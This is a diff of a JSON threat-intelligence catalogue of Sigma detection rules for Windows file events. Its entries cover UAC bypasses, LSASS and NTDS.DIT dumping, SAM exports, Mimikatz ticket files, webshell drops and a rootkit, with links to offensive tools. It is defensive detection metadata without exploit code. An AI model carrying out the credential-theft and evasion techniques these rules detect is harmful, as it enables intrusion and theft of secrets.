"attack.defense_evasion" + ] + }, + "uuid": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "value": "Drop Binaries Into Spool Drivers Color Folder" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File" + }, + { + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "System administrators managing certififcates." + ], + "filename": "file_event_win_susp_pfx_file_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/14", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "value": "Suspicious PFX File Creation" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown", + "Possibly some Microsoft Edge upgrades" + ], + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cve_2021_41379_msi_lpe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "value": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event" + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558" + ] + }, + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation" + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_net_cli_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact" + }, { "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", "meta": { @@ -24706,8 +25627,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" ], @@ -24719,6 +25640,477 @@ "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "value": "UAC Bypass Using EventVwr" }, + { + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "meta": { + "author": "Florian Roth (rule), MSTI (query, idea)", + "creation_date": "2022/10/01", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_exchange_webshell_drop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html", + "https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/", + "https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "value": "Suspicious ASPX File Drop by Exchange" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_mal_adwind.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact" + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_outlook_newform.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ] + }, + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation" + }, + { + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "meta": { + "author": "@pbssubhash", + "creation_date": "2022/12/08", + "falsepositive": [ + "Rare legitimate dump of the process by the operating system due to a crash of lsass" + ], + "filename": "file_event_win_lsass_shtinkering.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "6902955a-01b7-432c-b32a-6f5f81d8f625", + "value": "LSASS Process Dump Artefact In CrashDumps Folder" + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "meta": { + "author": "SecurityAura", + "creation_date": "2022/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_remote_cred_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_anydesk_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "0b9ad457-2554-44c1-82c2-d56a99c42377", + "value": "Anydesk Temporary Artefact" + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_wmiexec_default_filename.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047" + ] + }, + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File" + }, + { + "description": "A office file with macro is created from a commandline or a script", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_macro_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_creation_scr_binary_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.002" + ] + }, + "uuid": "97aa2e88-555c-450d-85a6-229bcd87efb8", + "value": "Suspicious Screensaver Binary File Creation" + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "creation_date": "2021/10/24", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + ], + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts" + }, + { + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_script_creation_by_office_using_file_ext.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.execution" + ] + }, + "uuid": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "value": "Created Files by Office Applications" + }, + { + "description": "When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\nCertain processes are not typically observed compiling C# code, but can do so without touching disk.\nThis can be used to unpack a payload for execution\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_csharp_compile_artefact.yml", + "level": "low", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.004" + ] + }, + "uuid": "e4a74e34-ecde-4aab-b2fb-9112dd01aed0", + "value": "Dynamic C Sharp Compile Artefact" + }, + { + "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "An FP could be caused by legitimate application writing shortcuts for example. This folder should always be inspected to make sure that all the files in there are legitimate" + ], + "filename": "file_event_win_startup_folder_file_write.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", + "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", + "value": "Startup Folder File Write" + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File" + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation" + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_exfil_tools.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns" + }, + { + "description": "Detects default lsass dump filename from SafetyKatz", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/07/24", + "falsepositive": [ + "Rare legitimate files with similar filename structure" + ], + "filename": "file_event_win_ghostpack_safetykatz.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ghostpack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "e074832a-eada-4fd7-94a1-10642b130e16", + "value": "SafetyKatz Default Dump Filename" + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "meta": { + "author": "Florian Roth, Sittikorn S", + "creation_date": "2021/09/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_winword_cve_2021_40444.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ] + }, + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444" + }, + { + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml" + ], + "tags": "No established tags" + }, + "uuid": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "value": "Suspicious Interactive PowerShell as SYSTEM" + }, { "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", "meta": { @@ -24746,20 +26138,45 @@ "value": "UAC Bypass Using IDiagnostic Profile - File" }, { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "description": "Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "file_event_win_susp_desktopimgdownldr_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1105" + ] + }, + "uuid": "fc4f4817-0c53-4683-a4ee-b17a64bc1039", + "value": "Suspicious Desktopimgdownldr Target File" + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", "meta": { "author": "Christian Burkard", - "creation_date": "2021/08/30", + "creation_date": "2021/08/23", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml", + "filename": "file_event_win_uac_bypass_consent_comctl32.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" ], "tags": [ "attack.defense_evasion", @@ -24767,8 +26184,89 @@ "attack.t1548.002" ] }, - "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "value": "UAC Bypass Using IEInstal - File" + "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "value": "UAC Bypass Using Consent and Comctl32 - File" + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "filename": "file_event_win_sam_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/HuskyHacks/ShadowSteal", + "https://github.com/search?q=CVE-2021-36934", + "https://github.com/FireFart/hivenightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "value": "SAM Dump File Creation" + }, + { + "description": "Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly.", + "meta": { + "author": "omkar72, oscd.community, Wojciech Lesicki", + "creation_date": "2020/10/12", + "falsepositive": [ + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" + ], + "filename": "file_event_win_susp_clr_logs.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml", + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_clr_logs.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1059.001", + "attack.t1218" + ] + }, + "uuid": "e4b63079-6198-405c-abd7-3fe8b0ce3263", + "value": "Suspicious CLR Logs Creation" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", @@ -24796,29 +26294,81 @@ "value": "UAC Bypass Using MSConfig Token Modification - File" }, { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", + "author": "frack113", + "creation_date": "2021/12/19", "falsepositive": [ "Unknown" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "filename": "file_event_win_access_susp_unattend_xml.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", + "value": "Suspicious Unattend.xml File Access" + }, + { + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "meta": { + "author": "D3F7A5105", + "creation_date": "2023/01/02", + "falsepositive": [ + "Admin activity", + "Backup activity" + ], + "filename": "file_event_win_create_evtx_non_common_locations.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "value": "EVTX Created In Uncommon Location" + }, + { + "description": "Detects files written by the different tools that exploit HiveNightmare", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/23", + "falsepositive": [ + "Files that accidentally contain these strings" + ], + "filename": "file_event_win_hivenightmare_file_exports.yml", "level": "high", "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/GossiTheDog/HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ] }, - "uuid": 